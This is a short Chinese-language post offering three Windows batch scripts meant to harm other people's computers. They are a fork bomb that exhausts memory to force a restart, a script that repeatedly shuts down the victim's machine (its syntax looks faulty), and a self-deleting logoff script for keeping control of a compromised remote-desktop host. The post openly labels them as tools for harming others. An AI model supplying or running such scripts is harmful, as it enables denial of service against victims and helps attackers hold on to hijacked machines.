第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0
就这3行了
第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt goto err1
if not exist c:\2.txt echo. >c:\2.txt goto err1
if not exist c:\3.txt echo. >c:\3.txt goto err1
if not exist c:\4.txt echo. >c:\4.txt goto err1
if not exist c:\5.txt echo. >c:\5.txt goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启
第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看